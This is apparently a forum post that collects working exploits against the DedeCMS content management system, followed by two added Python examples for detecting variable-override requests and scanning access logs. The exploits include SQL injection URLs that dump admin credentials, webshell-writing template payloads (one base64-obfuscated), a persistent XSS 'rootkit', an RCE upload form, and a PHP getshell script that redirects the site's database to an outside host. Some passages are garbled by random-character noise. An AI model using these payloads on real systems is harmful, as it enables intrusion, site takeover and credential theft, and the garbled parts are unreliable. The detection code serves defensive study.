DedeCMS vulnerability summary

Posted 2012-10-18 10:42:14

Dedecms 5.6 RSS injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member, upload a piece of software, and enter the following in the "local address" field:
a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it:
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, a one-line shell.
Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS rootkit. Note that IE8/9 block URL-borne XSS, so the XSS filter has to be turned off.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser. From then on, visiting any of the URLs below triggers our XSS, however the page is reached.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php
DeDeCMS (织梦) variable override getshell
#!/usr/bin/env php
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.comwww.webvul.com
');
echo "\r\n";
if($argv[2]==null){
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].'
www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// only the first response line (the HTTP status line) is returned, so "OK"
// at an offset past 12 means "HTTP/1.1 200 OK"
if (strpos($exp,"OK")>12){
    echo "
Exploit Success \n";
    if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
    if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
    if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
    echo "
Exploit Failed \n";
}

function Getshell($url,$aid,$path){
    $id=$aid;
    $host=$url;
    $port="80";
    // form body: the doaction target plus nested _COOKIE[GLOBALS][cfg_*] keys
    $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    // raw HTTP request assembled by hand and sent over a plain socket
    $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock=fsockopen($host,$port);
    if (!$ock) {
        echo "
No response from ".$host."\n";
        return ''; // added: do not write to a socket that failed to open
    }
    fwrite($ock,$data);
    while (!feof($ock)) {
        $exp=fgets($ock, 1024);
        return $exp;
    }
}
?>
DedeCms v5.6-5.7 unauthorized access vulnerability (straight into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you go straight into the site backend.

This only works if the backend path is already known.

/ Y5 L( `, ^) A8 {( I+ `$ G2 d1 r5 ^; D8 d# e' ~- w' G

9 }# K% `; b* d, {' J0 O; ~- u7 ?) t

& l# j0 ^( X- [6 C! _
8 z- s$ i% s5 Y( w! ?6 c0 W4 X7 x# [1 i% o! t. B

( A7 W0 |5 ]5 c. |# M: P
! w# R, b/ S" h0 w6 \4 Z3 Q# K3 ?" I% M; ~# `+ f4 V5 j+ c
Dedecms织梦 标签远程文件写入漏洞" ], J6 j; m, g; ?' J) a+ V
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');  K  a6 M  e# O5 s& y

9 g) g6 g0 F% t$ r8 _  h4 Y% f$ F8 s7 f3 G& J( Z
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
7 W3 I" i9 x# N4 r7 \<form action="" method="post" name="QuickSearch" id="QuickSearch">% G1 B/ J& F7 b5 D3 `0 b
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />) A& P' h+ C+ q2 f! Y! H
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />8 Z) a4 l1 {) U2 F8 A$ c, U8 t$ v
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
. D2 |/ Z4 n8 K9 x. l<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
" d5 b- w" [. L7 X! g5 l2 M<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
% P* [6 P$ S( {9 l3 @<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />9 ?) S, [, z6 l2 h
<input type="text" value="true" name="nocache" style="width:400">
+ @4 S! L$ r3 s5 Z) I2 d9 h<input type="submit" value="提交" name="QuickSearchBtn"><br />7 o4 X; J' B8 f8 x& U
</form>- L  N' S" `; y4 K7 M2 m7 s0 M
<script>
$ A0 g$ |0 C% T8 y! Nfunction addaction()
3 B! }# I$ V4 N5 p# |  Z& f{
  T, H$ n$ R2 Cdocument.QuickSearch.action=document.QuickSearch.doaction.value;: T% o; f/ M) W! U& z2 n- r
}
+ f) f3 B# B) K' L( _</script>
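The override forms above (and the login URL earlier that carries _POST[GLOBALS][...] in its query string) work because a register_globals-style loop turns every submitted key into a PHP variable, and a check that only inspects the outermost key name never sees the nested GLOBALS and cfg_ parts. The Python below is an added example, not code from this post or from DedeCMS: it parses PHP-style nested keys the way PHP fills $_POST, then compares a top-level-only check with a recursive one. The blocked prefixes, the superglobal list and the sample bodies are my own; 203.0.113.10 is a TEST-NET placeholder.

```python
import re
from urllib.parse import parse_qsl

# Variable names a request must never be allowed to register: the application's
# cfg_* settings and PHP's superglobals. Both lists are assumptions for this example.
CONFIG_PREFIX = re.compile(r'^(cfg_|GLOBALS)', re.I)
SUPERGLOBALS = {'GLOBALS', '_GET', '_POST', '_COOKIE', '_REQUEST', '_SERVER',
                '_SESSION', '_FILES', '_ENV'}

KEY_SHAPE = re.compile(r'^([^\[]+)((?:\[[^\]]*\])*)$')


def parse_php_keys(body: str) -> dict:
    """Build the structure PHP puts in $_POST/$_GET: a[b][c]=v -> {'a': {'b': {'c': 'v'}}}.
    Empty brackets ([]) append with the next numeric index, as PHP does."""
    tree: dict = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = KEY_SHAPE.match(key)
        if not m:
            continue
        path = [m.group(1)] + re.findall(r'\[([^\]]*)\]', m.group(2))
        node = tree
        for part in path[:-1]:
            part = part or str(len(node))
            node = node.setdefault(part, {})
            if not isinstance(node, dict):   # a scalar already sits under this name
                break
        else:
            leaf = path[-1] or str(len(node))
            node[leaf] = value
    return tree


def shallow_check(tree: dict) -> list:
    """The weak check: only the outermost key is compared against the blocked prefixes."""
    return [k for k in tree if CONFIG_PREFIX.match(k)]


def recursive_check(tree: dict, prefix: str = '') -> list:
    """Walk keys at every depth and also refuse the superglobal names themselves.
    Returns the offending keys in PHP bracket notation."""
    hits = []
    for k, v in tree.items():
        name = f'{prefix}[{k}]' if prefix else k
        if CONFIG_PREFIX.match(k) or k in SUPERGLOBALS:
            hits.append(name)
        if isinstance(v, dict):
            hits.extend(recursive_check(v, name))
    return hits


# Constructed request bodies following the shapes on this page.
OVERRIDE_BODY = ('doaction=http%3A%2F%2Fexample.test%2Fplus%2Fmytag_js.php%3Faid%3D1'
                 '&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.10'
                 '&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&nocache=true')
LOGIN_QUERY = 'dopost=login&userid=admin&pwd=x&_POST[GLOBALS][cfg_dbhost]=203.0.113.10'
BENIGN_BODY = 'aid=1&title=hello&tags[]=a&tags[]=b'

if __name__ == '__main__':
    for label, body in (('override', OVERRIDE_BODY), ('login', LOGIN_QUERY), ('benign', BENIGN_BODY)):
        tree = parse_php_keys(body)
        print(label, 'shallow:', shallow_check(tree), 'recursive:', recursive_check(tree))
```

The shallow check blocks cfg_dbhost=... and GLOBALS[...]=... but reports nothing for either payload body, because their outer keys are _COOKIE and _POST. The recursive walk refuses them at every level and additionally refuses registering variables named after superglobals. The real fix is to drop register_globals emulation entirely and read $_GET and $_POST explicitly.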
Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member backend, publish an article and upload an image; then in attachment management replace the image with our carefully constructed template. For example the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is checked, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(constructed here)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>
Submit; if it reports that the edit succeeded, we have changed the template path.
3. Visit the edited article. Assuming the edited article's aid is 2, just request:

http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.
DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Construct the form above; after uploading, the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5; to get the 16-character MD5, remove 3 more characters from the front and 1 from the end.
织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
织梦 (Dedecms) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It combines a MySQL numeric field overflow that raises an error with the fact that DedeCMS records database error messages into a PHP file whose header carries no guard.
1. Visit the URL:

http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is displayed.

2. Visit
http://www.abc.com/data/mysql_error_trace.php ; the following output shows that the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar, noting that the form's action address is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After clicking OK, seeing the same output as in step 2 means the trojan file was uploaded successfully.
织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
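Nearly every entry on this page leaves a recognisable shape in the web server's access log. The Python script below is an added example, not from the post, that scans Common Log Format lines for those shapes: GLOBALS/cfg_ override keys in a query string, a raw sql= parameter to plus/advancedsearch.php, script tags in gotopage, {dede:} template tags, ../ traversal in file parameters, reads of data/mysql_error_trace.php, and updatexml()/extractvalue() error-based injection. The log lines are constructed with TEST-NET addresses and the rule names are my own.

```python
import re
from urllib.parse import unquote_plus

# Common Log Format line; only client address, method, request target and status are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+')

# Each rule is matched against the percent-decoded request target.
RULES = [
    ('globals_override', re.compile(r'(?:^|[?&])(?:_COOKIE|_POST|_GET|_REQUEST)\[GLOBALS\]'
                                    r'|(?:^|[?&])(?:GLOBALS\[|cfg_)', re.I)),
    ('raw_sql_param',    re.compile(r'/plus/advancedsearch\.php\?(?:.*&)?sql=', re.I)),
    ('reflected_script', re.compile(r'[?&][^=&]*=[^&]*(?:<script|javascript:)', re.I)),
    ('template_tag',     re.compile(r'\{/?dede:', re.I)),
    ('path_traversal',   re.compile(r'[?&][^=&]*=[^&]*\.\./')),
    ('error_trace_read', re.compile(r'^/data/mysql_error_trace\.php(?:\?|$)', re.I)),
    ('xml_error_sqli',   re.compile(r'\b(?:updatexml|extractvalue)\s*\(', re.I)),
]


def decode_target(target: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded payloads are seen in the clear."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify(target: str) -> list:
    """Names of the rules that fire on one request target."""
    decoded = decode_target(target)
    return [name for name, rx in RULES if rx.search(decoded)]


def scan(log_text: str) -> list:
    """One record per log line that triggered at least one rule.
    POST bodies are not in the access log, so body-carried payloads (the mytag_js
    override form, the toby57 tag) need a WAF or request-body logging to be seen."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rules = classify(m['target'])
        if rules:
            findings.append({'ip': m['ip'], 'method': m['method'],
                             'target': m['target'], 'rules': rules})
    return findings


# Constructed sample log (TEST-NET addresses), shaped after the requests on this page.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 512
203.0.113.5 - - [18/Oct/2012:10:42:15 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx=%22 HTTP/1.1" 200 1024
203.0.113.5 - - [18/Oct/2012:10:42:16 +0800] "POST /plus/mytag_js.php?aid=1 HTTP/1.1" 200 128
203.0.113.5 - - [18/Oct/2012:10:42:17 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 64
203.0.113.5 - - [18/Oct/2012:10:42:18 +0800] "GET /data/mysql_error_trace.php HTTP/1.1" 200 256
203.0.113.5 - - [18/Oct/2012:10:42:19 +0800] "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml(1,2,3)%23][0]=1 HTTP/1.1" 500 300
203.0.113.5 - - [18/Oct/2012:10:42:20 +0800] "GET /dede/login.php?dopost=login&userid=admin&pwd=x&_POST[GLOBALS][cfg_dbhost]=203.0.113.10 HTTP/1.1" 302 0
198.51.100.7 - - [18/Oct/2012:10:43:00 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 4096
"""

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f['ip'], f['method'], ','.join(f['rules']), f['target'])
```

The POST to mytag_js.php and the benign view.php request produce no finding, which is the point worth noticing: the variable-override body and the template tags travel in the request body, so an access log alone cannot catch them and a web application firewall or body logging has to sit in front of the application.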